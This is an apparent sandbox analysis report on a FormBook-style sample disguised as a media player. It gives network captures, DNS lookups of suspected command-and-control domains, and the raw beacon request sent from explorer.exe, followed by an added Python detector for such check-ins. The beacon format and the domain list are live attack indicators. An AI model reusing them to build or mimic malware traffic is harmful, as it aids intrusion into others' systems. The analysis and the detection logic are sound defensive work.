RT_VERSION   0xb6090  0x38c  PGP symmetric key encrypted data - Plaintext or unencrypted data
RT_MANIFEST  0xb642c  0xa85  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                                                    Imports

DLL          Import
mscoree.dll  _CorExeMain

                                                                    Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2018
Assembly Version  1.0.0.0
InternalName      TOKENPRIMARYGROUP.exe
FileVersion       1.0.1.35
CompanyName       Unguest
LegalTrademarks   Unguest
Comments          A light media player
ProductName       LightWatch
ProductVersion    1.0.1.35
FileDescription   LightWatch
OriginalFilename  TOKENPRIMARYGROUP.exe

                                                                    Network Behavior

                                                                    Snort IDS Alerts

Timestamp                 Protocol  SID  Message                                Source Port  Dest Port  Source IP      Dest IP
05/03/21-14:52:13.170221  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:13.208071  ICMP      449  ICMP Time-To-Live Exceeded in Transit                          84.17.52.126   192.168.2.6
05/03/21-14:52:13.208862  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:13.243956  ICMP      449  ICMP Time-To-Live Exceeded in Transit                          149.11.89.129  192.168.2.6
05/03/21-14:52:13.245145  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:13.284303  ICMP      449  ICMP Time-To-Live Exceeded in Transit                          130.117.50.25  192.168.2.6
05/03/21-14:52:13.285192  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:13.326276  ICMP      449  ICMP Time-To-Live Exceeded in Transit                          130.117.0.62   192.168.2.6
05/03/21-14:52:13.327004  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:13.373769  ICMP      449  ICMP Time-To-Live Exceeded in Transit                          154.54.36.253  192.168.2.6
05/03/21-14:52:13.374138  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:13.420985  ICMP      449  ICMP Time-To-Live Exceeded in Transit                          154.54.37.30   192.168.2.6
05/03/21-14:52:13.423338  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:17.216262  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:21.221518  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:25.217066  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:29.445869  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:33.218240  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:33.262544  ICMP      449  ICMP Time-To-Live Exceeded in Transit                          4.69.163.33    192.168.2.6
05/03/21-14:52:33.263052  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:37.218445  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:41.217783  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:45.219410  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:49.218385  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:53.220185  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:52:57.218909  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:53:01.219208  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:53:05.219924  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:53:09.220096  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:53:13.220160  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:53:17.221426  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:53:21.221815  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:53:25.221377  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:53:29.221725  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:53:33.255775  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:53:37.226355  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
05/03/21-14:53:41.222918  ICMP      384  ICMP PING                                                      192.168.2.6    8.241.89.254
                                                                    05/03/21-14:53:41.302735TCP1201ATTACK-RESPONSES 403 Forbidden804975434.102.136.180192.168.2.6
                                                                    05/03/21-14:53:45.223564ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:49.223311ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:53.223679ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:53:57.224332ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:01.236118ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:02.995352TCP1201ATTACK-RESPONSES 403 Forbidden804976234.102.136.180192.168.2.6
                                                                    05/03/21-14:54:05.232558ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:09.237107ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:13.233310ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:17.233252ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:21.233525ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:25.233831ICMP384ICMP PING192.168.2.68.241.89.254
                                                                    05/03/21-14:54:29.234762ICMP384ICMP PING192.168.2.68.241.89.254

                                                                    Network Port Distribution

                                                                    TCP Packets

Timestamp                            Source Port  Dest Port  Source IP        Dest IP
May 3, 2021 14:53:41.123671055 CEST  49754        80         192.168.2.6      34.102.136.180
May 3, 2021 14:53:41.164711952 CEST  80           49754      34.102.136.180   192.168.2.6
May 3, 2021 14:53:41.164901972 CEST  49754        80         192.168.2.6      34.102.136.180
May 3, 2021 14:53:41.165328026 CEST  49754        80         192.168.2.6      34.102.136.180
May 3, 2021 14:53:41.206484079 CEST  80           49754      34.102.136.180   192.168.2.6
May 3, 2021 14:53:41.302735090 CEST  80           49754      34.102.136.180   192.168.2.6
May 3, 2021 14:53:41.302769899 CEST  80           49754      34.102.136.180   192.168.2.6
May 3, 2021 14:53:41.303035021 CEST  49754        80         192.168.2.6      34.102.136.180
May 3, 2021 14:53:41.303069115 CEST  49754        80         192.168.2.6      34.102.136.180
May 3, 2021 14:53:41.344063044 CEST  80           49754      34.102.136.180   192.168.2.6
May 3, 2021 14:53:46.635814905 CEST  49757        80         192.168.2.6      202.254.234.152
May 3, 2021 14:53:46.949348927 CEST  80           49757      202.254.234.152  192.168.2.6
May 3, 2021 14:53:46.949485064 CEST  49757        80         192.168.2.6      202.254.234.152
May 3, 2021 14:53:46.949692011 CEST  49757        80         192.168.2.6      202.254.234.152
May 3, 2021 14:53:47.263036013 CEST  80           49757      202.254.234.152  192.168.2.6
May 3, 2021 14:53:47.265083075 CEST  80           49757      202.254.234.152  192.168.2.6
May 3, 2021 14:53:47.265172958 CEST  80           49757      202.254.234.152  192.168.2.6
May 3, 2021 14:53:47.265407085 CEST  49757        80         192.168.2.6      202.254.234.152
May 3, 2021 14:53:47.265433073 CEST  49757        80         192.168.2.6      202.254.234.152
May 3, 2021 14:53:47.578778028 CEST  80           49757      202.254.234.152  192.168.2.6
May 3, 2021 14:53:52.445022106 CEST  49760        80         192.168.2.6      181.214.142.2
May 3, 2021 14:53:52.576229095 CEST  80           49760      181.214.142.2    192.168.2.6
May 3, 2021 14:53:52.576344967 CEST  49760        80         192.168.2.6      181.214.142.2
May 3, 2021 14:53:52.576576948 CEST  49760        80         192.168.2.6      181.214.142.2
May 3, 2021 14:53:52.707530022 CEST  80           49760      181.214.142.2    192.168.2.6
May 3, 2021 14:53:52.709163904 CEST  80           49760      181.214.142.2    192.168.2.6
May 3, 2021 14:53:52.709183931 CEST  80           49760      181.214.142.2    192.168.2.6
May 3, 2021 14:53:52.709220886 CEST  80           49760      181.214.142.2    192.168.2.6
May 3, 2021 14:53:52.709239006 CEST  80           49760      181.214.142.2    192.168.2.6
May 3, 2021 14:53:52.709256887 CEST  80           49760      181.214.142.2    192.168.2.6
May 3, 2021 14:53:52.709278107 CEST  80           49760      181.214.142.2    192.168.2.6
May 3, 2021 14:53:52.709296942 CEST  80           49760      181.214.142.2    192.168.2.6
May 3, 2021 14:53:52.709311962 CEST  80           49760      181.214.142.2    192.168.2.6
May 3, 2021 14:53:52.709326029 CEST  80           49760      181.214.142.2    192.168.2.6
May 3, 2021 14:53:52.709336996 CEST  49760        80         192.168.2.6      181.214.142.2
May 3, 2021 14:53:52.709460020 CEST  49760        80         192.168.2.6      181.214.142.2
May 3, 2021 14:53:52.709512949 CEST  49760        80         192.168.2.6      181.214.142.2
May 3, 2021 14:53:52.842205048 CEST  80           49760      181.214.142.2    192.168.2.6
May 3, 2021 14:54:02.815330029 CEST  49762        80         192.168.2.6      34.102.136.180
May 3, 2021 14:54:02.856976986 CEST  80           49762      34.102.136.180   192.168.2.6
May 3, 2021 14:54:02.857342958 CEST  49762        80         192.168.2.6      34.102.136.180
May 3, 2021 14:54:02.857573986 CEST  49762        80         192.168.2.6      34.102.136.180
May 3, 2021 14:54:02.898530960 CEST  80           49762      34.102.136.180   192.168.2.6
May 3, 2021 14:54:02.995352030 CEST  80           49762      34.102.136.180   192.168.2.6
May 3, 2021 14:54:02.995368958 CEST  80           49762      34.102.136.180   192.168.2.6
May 3, 2021 14:54:02.996453047 CEST  49762        80         192.168.2.6      34.102.136.180
May 3, 2021 14:54:02.996651888 CEST  49762        80         192.168.2.6      34.102.136.180
May 3, 2021 14:54:03.038955927 CEST  80           49762      34.102.136.180   192.168.2.6
May 3, 2021 14:54:13.178071022 CEST  49763        80         192.168.2.6      107.180.57.119
May 3, 2021 14:54:13.310555935 CEST  80           49763      107.180.57.119   192.168.2.6
May 3, 2021 14:54:13.310719013 CEST  49763        80         192.168.2.6      107.180.57.119
May 3, 2021 14:54:13.310914993 CEST  49763        80         192.168.2.6      107.180.57.119
May 3, 2021 14:54:13.442984104 CEST  80           49763      107.180.57.119   192.168.2.6
May 3, 2021 14:54:13.470249891 CEST  80           49763      107.180.57.119   192.168.2.6
May 3, 2021 14:54:13.470271111 CEST  80           49763      107.180.57.119   192.168.2.6
May 3, 2021 14:54:13.470285892 CEST  80           49763      107.180.57.119   192.168.2.6
May 3, 2021 14:54:13.470494986 CEST  49763        80         192.168.2.6      107.180.57.119
May 3, 2021 14:54:13.470557928 CEST  49763        80         192.168.2.6      107.180.57.119
May 3, 2021 14:54:13.602511883 CEST  80           49763      107.180.57.119   192.168.2.6

                                                                    UDP Packets

Timestamp                            Source Port  Dest Port  Source IP        Dest IP
May 3, 2021 14:52:06.801609993 CEST  51774        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:06.850207090 CEST  53           51774      8.8.8.8          192.168.2.6
May 3, 2021 14:52:07.866614103 CEST  56023        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:07.917653084 CEST  53           56023      8.8.8.8          192.168.2.6
May 3, 2021 14:52:09.031147957 CEST  58384        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:09.085213900 CEST  53           58384      8.8.8.8          192.168.2.6
May 3, 2021 14:52:10.104856014 CEST  60261        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:10.164602041 CEST  53           60261      8.8.8.8          192.168.2.6
May 3, 2021 14:52:11.426073074 CEST  56061        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:11.474884033 CEST  53           56061      8.8.8.8          192.168.2.6
May 3, 2021 14:52:12.578313112 CEST  58336        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:12.627011061 CEST  53           58336      8.8.8.8          192.168.2.6
May 3, 2021 14:52:13.094438076 CEST  53781        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:13.169132948 CEST  53           53781      8.8.8.8          192.168.2.6
May 3, 2021 14:52:13.644759893 CEST  54064        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:13.694717884 CEST  53           54064      8.8.8.8          192.168.2.6
May 3, 2021 14:52:14.624813080 CEST  52811        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:14.676548004 CEST  53           52811      8.8.8.8          192.168.2.6
May 3, 2021 14:52:16.291661024 CEST  55299        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:16.343203068 CEST  53           55299      8.8.8.8          192.168.2.6
May 3, 2021 14:52:17.243180037 CEST  63745        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:17.300841093 CEST  53           63745      8.8.8.8          192.168.2.6
May 3, 2021 14:52:18.206481934 CEST  50055        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:18.255245924 CEST  53           50055      8.8.8.8          192.168.2.6
May 3, 2021 14:52:19.370393038 CEST  61374        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:19.419213057 CEST  53           61374      8.8.8.8          192.168.2.6
May 3, 2021 14:52:20.784404039 CEST  50339        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:20.833194017 CEST  53           50339      8.8.8.8          192.168.2.6
May 3, 2021 14:52:21.732249975 CEST  63307        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:21.781076908 CEST  53           63307      8.8.8.8          192.168.2.6
May 3, 2021 14:52:22.957520008 CEST  49694        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:23.006467104 CEST  53           49694      8.8.8.8          192.168.2.6
May 3, 2021 14:52:24.825062990 CEST  54982        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:24.873651981 CEST  53           54982      8.8.8.8          192.168.2.6
May 3, 2021 14:52:25.944996119 CEST  50010        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:25.997683048 CEST  53           50010      8.8.8.8          192.168.2.6
May 3, 2021 14:52:39.021899939 CEST  63718        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:39.070730925 CEST  53           63718      8.8.8.8          192.168.2.6
May 3, 2021 14:52:43.575400114 CEST  62116        53         192.168.2.6      8.8.8.8
May 3, 2021 14:52:43.628989935 CEST  53           62116      8.8.8.8          192.168.2.6
May 3, 2021 14:53:02.776420116 CEST  63816        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:02.835649014 CEST  53           63816      8.8.8.8          192.168.2.6
May 3, 2021 14:53:09.870780945 CEST  55014        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:10.079027891 CEST  53           55014      8.8.8.8          192.168.2.6
May 3, 2021 14:53:10.188205957 CEST  62208        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:10.256165028 CEST  53           62208      8.8.8.8          192.168.2.6
May 3, 2021 14:53:11.570303917 CEST  57574        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:11.623312950 CEST  53           57574      8.8.8.8          192.168.2.6
May 3, 2021 14:53:12.723320961 CEST  51818        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:12.848351955 CEST  53           51818      8.8.8.8          192.168.2.6
May 3, 2021 14:53:13.611901045 CEST  56628        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:13.724877119 CEST  53           56628      8.8.8.8          192.168.2.6
May 3, 2021 14:53:15.156788111 CEST  60778        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:15.214942932 CEST  53           60778      8.8.8.8          192.168.2.6
May 3, 2021 14:53:16.745594978 CEST  53799        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:16.805594921 CEST  54683        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:16.806613922 CEST  53           53799      8.8.8.8          192.168.2.6
May 3, 2021 14:53:16.865751982 CEST  53           54683      8.8.8.8          192.168.2.6
May 3, 2021 14:53:17.709784985 CEST  59329        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:17.852190971 CEST  53           59329      8.8.8.8          192.168.2.6
May 3, 2021 14:53:20.214184046 CEST  64021        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:20.266258001 CEST  53           64021      8.8.8.8          192.168.2.6
May 3, 2021 14:53:22.851625919 CEST  56129        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:22.910708904 CEST  53           56129      8.8.8.8          192.168.2.6
May 3, 2021 14:53:23.646487951 CEST  58177        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:23.703864098 CEST  53           58177      8.8.8.8          192.168.2.6
May 3, 2021 14:53:41.036803007 CEST  50700        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:41.099087954 CEST  53           50700      8.8.8.8          192.168.2.6
May 3, 2021 14:53:46.320147038 CEST  54069        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:46.609731913 CEST  61178        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:46.634038925 CEST  53           54069      8.8.8.8          192.168.2.6
May 3, 2021 14:53:46.644306898 CEST  57017        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:46.668921947 CEST  53           61178      8.8.8.8          192.168.2.6
May 3, 2021 14:53:46.693243027 CEST  53           57017      8.8.8.8          192.168.2.6
May 3, 2021 14:53:52.274975061 CEST  56327        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:52.444093943 CEST  53           56327      8.8.8.8          192.168.2.6
May 3, 2021 14:53:53.144257069 CEST  50243        53         192.168.2.6      8.8.8.8
May 3, 2021 14:53:53.218609095 CEST  53           50243      8.8.8.8          192.168.2.6
May 3, 2021 14:54:02.750222921 CEST  62055        53         192.168.2.6      8.8.8.8
May 3, 2021 14:54:02.814151049 CEST  53           62055      8.8.8.8          192.168.2.6
May 3, 2021 14:54:08.005501032 CEST  61249        53         192.168.2.6      8.8.8.8
May 3, 2021 14:54:08.063040972 CEST  53           61249      8.8.8.8          192.168.2.6
May 3, 2021 14:54:13.094579935 CEST  65252        53         192.168.2.6      8.8.8.8
May 3, 2021 14:54:13.176599026 CEST  53           65252      8.8.8.8          192.168.2.6
May 3, 2021 14:54:18.493829966 CEST  64367        53         192.168.2.6      8.8.8.8
May 3, 2021 14:54:18.563572884 CEST  53           64367      8.8.8.8          192.168.2.6
May 3, 2021 14:54:23.578939915 CEST  55066        53         192.168.2.6      8.8.8.8
May 3, 2021 14:54:23.788476944 CEST  53           55066      8.8.8.8          192.168.2.6
May 3, 2021 14:54:29.500647068 CEST  60211        53         192.168.2.6      8.8.8.8
May 3, 2021 14:54:29.579925060 CEST  53           60211      8.8.8.8          192.168.2.6

                                                                    DNS Queries

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                       Type            Class
May 3, 2021 14:53:41.036803007 CEST  192.168.2.6  8.8.8.8  0x58cd    Standard query (0)  www.dinkoistmatrimony.com  A (IP address)  IN (0x0001)
May 3, 2021 14:53:46.320147038 CEST  192.168.2.6  8.8.8.8  0xcbad    Standard query (0)  www.premier-moment.info    A (IP address)  IN (0x0001)
May 3, 2021 14:53:52.274975061 CEST  192.168.2.6  8.8.8.8  0x53de    Standard query (0)  www.ecosanhn.com           A (IP address)  IN (0x0001)
May 3, 2021 14:54:02.750222921 CEST  192.168.2.6  8.8.8.8  0xd3c6    Standard query (0)  www.curvygirlholiday.com   A (IP address)  IN (0x0001)
May 3, 2021 14:54:08.005501032 CEST  192.168.2.6  8.8.8.8  0x4030    Standard query (0)  www.vipbrandwatch.info     A (IP address)  IN (0x0001)
May 3, 2021 14:54:13.094579935 CEST  192.168.2.6  8.8.8.8  0xd69b    Standard query (0)  www.networkingmaderas.com  A (IP address)  IN (0x0001)
May 3, 2021 14:54:18.493829966 CEST  192.168.2.6  8.8.8.8  0x230d    Standard query (0)  www.beachrockisland.com    A (IP address)  IN (0x0001)
May 3, 2021 14:54:23.578939915 CEST  192.168.2.6  8.8.8.8  0x847e    Standard query (0)  www.itechfreak.com         A (IP address)  IN (0x0001)
May 3, 2021 14:54:29.500647068 CEST  192.168.2.6  8.8.8.8  0x704c    Standard query (0)  www.jaimericart.com        A (IP address)  IN (0x0001)

                                                                    DNS Answers

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                       CName                  Address          Type                    Class
May 3, 2021 14:53:41.099087954 CEST  8.8.8.8    192.168.2.6  0x58cd    No error (0)    www.dinkoistmatrimony.com  dinkoistmatrimony.com  -                CNAME (Canonical name)  IN (0x0001)
May 3, 2021 14:53:41.099087954 CEST  8.8.8.8    192.168.2.6  0x58cd    No error (0)    dinkoistmatrimony.com      -                      34.102.136.180   A (IP address)          IN (0x0001)
May 3, 2021 14:53:46.634038925 CEST  8.8.8.8    192.168.2.6  0xcbad    No error (0)    www.premier-moment.info    -                      202.254.234.152  A (IP address)          IN (0x0001)
May 3, 2021 14:53:52.444093943 CEST  8.8.8.8    192.168.2.6  0x53de    No error (0)    www.ecosanhn.com           ecosanhn.com           -                CNAME (Canonical name)  IN (0x0001)
May 3, 2021 14:53:52.444093943 CEST  8.8.8.8    192.168.2.6  0x53de    No error (0)    ecosanhn.com               -                      181.214.142.2    A (IP address)          IN (0x0001)
May 3, 2021 14:54:02.814151049 CEST  8.8.8.8    192.168.2.6  0xd3c6    No error (0)    www.curvygirlholiday.com   curvygirlholiday.com   -                CNAME (Canonical name)  IN (0x0001)
May 3, 2021 14:54:02.814151049 CEST  8.8.8.8    192.168.2.6  0xd3c6    No error (0)    curvygirlholiday.com       -                      34.102.136.180   A (IP address)          IN (0x0001)
May 3, 2021 14:54:08.063040972 CEST  8.8.8.8    192.168.2.6  0x4030    Name error (3)  www.vipbrandwatch.info     none                   none             A (IP address)          IN (0x0001)
May 3, 2021 14:54:13.176599026 CEST  8.8.8.8    192.168.2.6  0xd69b    No error (0)    www.networkingmaderas.com  networkingmaderas.com  -                CNAME (Canonical name)  IN (0x0001)
May 3, 2021 14:54:13.176599026 CEST  8.8.8.8    192.168.2.6  0xd69b    No error (0)    networkingmaderas.com      -                      107.180.57.119   A (IP address)          IN (0x0001)
May 3, 2021 14:54:18.563572884 CEST  8.8.8.8    192.168.2.6  0x230d    Name error (3)  www.beachrockisland.com    none                   none             A (IP address)          IN (0x0001)
May 3, 2021 14:54:23.788476944 CEST  8.8.8.8    192.168.2.6  0x847e    No error (0)    www.itechfreak.com         -                      192.238.144.41   A (IP address)          IN (0x0001)
May 3, 2021 14:54:29.579925060 CEST  8.8.8.8    192.168.2.6  0x704c    No error (0)    www.jaimericart.com        jaimericart.com        -                CNAME (Canonical name)  IN (0x0001)
May 3, 2021 14:54:29.579925060 CEST  8.8.8.8    192.168.2.6  0x704c    No error (0)    jaimericart.com            -                      81.88.48.71      A (IP address)          IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • www.dinkoistmatrimony.com
                                                                    • www.premier-moment.info
                                                                    • www.ecosanhn.com
                                                                    • www.curvygirlholiday.com
                                                                    • www.networkingmaderas.com
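
The HTTP Packets section that follows shows the shape of the FormBook check-in: a GET to the short path /maw9/ with two query parameters, an opaque base64 blob in AVF and the constant value 6l=sHbLpdw8x0Nx4, sent with Connection: close to one domain after another from C:\Windows\explorer.exe. The Python script below is an added example, not part of the Joe Sandbox report or of any FormBook tooling; it turns that shape into detection logic run over a constructed list of captured requests. The /maw9/ path, the AVF and 6l parameter names and the 6l token are taken from the report; the record list, the firefox.exe filler request and the AVF value of the third record are constructed for the example.

```python
"""Flag FormBook-style HTTP check-ins: GET /<short-path>/?<key>=<base64 blob>&<key>=<constant>
with "Connection: close", the same (path, constant) pair reused against several Host headers
within a short window, from a process such as explorer.exe that has no business speaking HTTP.
Added example; the sample records are constructed, not taken from a real capture."""
import base64
import binascii
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

FORMBOOK_TOKEN = "6l=sHbLpdw8x0Nx4"  # constant second parameter seen in the report
FAKE_BLOB = base64.b64encode(b"constructed blob for the third sample request!!!").decode()  # constructed
# Constructed records: (timestamp, originating process, raw HTTP request head).
SAMPLE_REQUESTS = [
    ("2021-05-03 14:53:41", r"C:\Windows\explorer.exe",
     "GET /maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&"
     + FORMBOOK_TOKEN + " HTTP/1.1\r\nHost: www.dinkoistmatrimony.com\r\nConnection: close\r\n\r\n"),
    ("2021-05-03 14:53:46", r"C:\Windows\explorer.exe",
     "GET /maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&"
     + FORMBOOK_TOKEN + " HTTP/1.1\r\nHost: www.premier-moment.info\r\nConnection: close\r\n\r\n"),
    ("2021-05-03 14:53:50", r"C:\Program Files\Mozilla Firefox\firefox.exe",  # benign filler
     "GET /search?q=weather&src=toolbar HTTP/1.1\r\nHost: www.example.org\r\nConnection: keep-alive\r\n\r\n"),
    ("2021-05-03 14:54:02", r"C:\Windows\explorer.exe",
     "GET /maw9/?AVF=" + FAKE_BLOB + "&" + FORMBOOK_TOKEN
     + " HTTP/1.1\r\nHost: www.curvygirlholiday.com\r\nConnection: close\r\n\r\n"),
]

SHORT_PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")


def parse_request(raw):
    """Split an HTTP/1.1 request head into method, path, query params and headers.
    Query values are kept verbatim: urllib's parse_qs() would turn the '+' inside
    the base64 blob into a space and defeat the base64 check below."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    params = {}
    for pair in parts.query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[key] = value
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": parts.path, "params": params, "headers": headers}


def is_base64_blob(value, min_len=40):
    """True for a correctly padded base64 string of at least min_len characters."""
    if len(value) < min_len:
        return False
    try:
        base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def checkin_key(req):
    """Return (path, token_param, token) when the request has the beacon shape, else None."""
    if req["method"] != "GET" or not SHORT_PATH_RE.match(req["path"]):
        return None
    if req["headers"].get("connection", "").lower() != "close":
        return None
    params = req["params"]
    if len(params) != 2:
        return None
    blobs = [k for k, v in params.items() if is_base64_blob(v)]
    if len(blobs) != 1:
        return None
    (token_param,) = [k for k in params if k != blobs[0]]
    return (req["path"], token_param, params[token_param])


def find_beacon_campaigns(records, min_hosts=2, window_seconds=300):
    """Group beacon-shaped requests by (path, token) and report groups that hit at least
    min_hosts distinct Host headers within window_seconds. A single such request could be
    a coincidence; the constant token tying unrelated domains together is the signal."""
    groups = defaultdict(list)
    for ts, process, raw in records:
        req = parse_request(raw)
        key = checkin_key(req)
        if key is not None:
            groups[key].append((datetime.fromisoformat(ts), req["headers"].get("host", ""), process))
    findings = []
    for (path, token_param, token), hits in groups.items():
        hits.sort()
        span = (hits[-1][0] - hits[0][0]).total_seconds()
        hosts = sorted({host for _, host, _ in hits})
        if len(hosts) >= min_hosts and span <= window_seconds:
            findings.append({"path": path, "token_param": token_param, "token": token,
                             "hosts": hosts, "span_seconds": span,
                             "processes": sorted({proc for _, _, proc in hits})})
    return findings


if __name__ == "__main__":
    for finding in find_beacon_campaigns(SAMPLE_REQUESTS):
        print(finding)
```

Run against the constructed records this reports one campaign: path /maw9/, token 6l=sHbLpdw8x0Nx4, three hosts hit within 21 seconds, all from explorer.exe. The process column matters as much as the URL shape; the report's own "System process connects to network" signature fires on exactly that, and in a real deployment the process names would come from an EDR or sandbox process-to-socket mapping rather than from the capture. The grouping key deliberately ignores the Host header, because FormBook walks through decoy domains (several here answer 403 or NXDOMAIN) and only one or two of them are the live C2.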

                                                                    HTTP Packets

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.6  49754        34.102.136.180  80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
May 3, 2021 14:53:41.165328026 CEST  10311               OUT        GET /maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4 HTTP/1.1
                                                                    Host: www.dinkoistmatrimony.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
May 3, 2021 14:53:41.302735090 CEST  10311               IN         HTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Mon, 03 May 2021 12:53:41 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "6089be8c-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
